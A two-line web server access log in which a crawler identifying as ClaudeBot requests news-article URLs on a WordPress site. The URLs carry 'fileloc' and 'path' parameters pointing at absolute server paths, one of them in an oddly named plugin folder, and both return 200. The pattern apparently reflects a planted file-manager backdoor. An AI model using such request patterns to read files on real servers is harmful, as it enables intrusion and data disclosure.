216.73.216.104 - - [31/Oct/2025:12:23:55 +0000] "GET /2023/12/01/uncertainty-sparked-by-opecs-oil-cuts-what-lies-ahead?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fjtgbpnr%2Freadme.txt&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fjtgbpnr HTTP/1.1" 200 15196 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:55 +0000] "GET /2023/12/29/appeals-court-overturns-ban-on-apple-watch?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fembed-template.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 12866 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
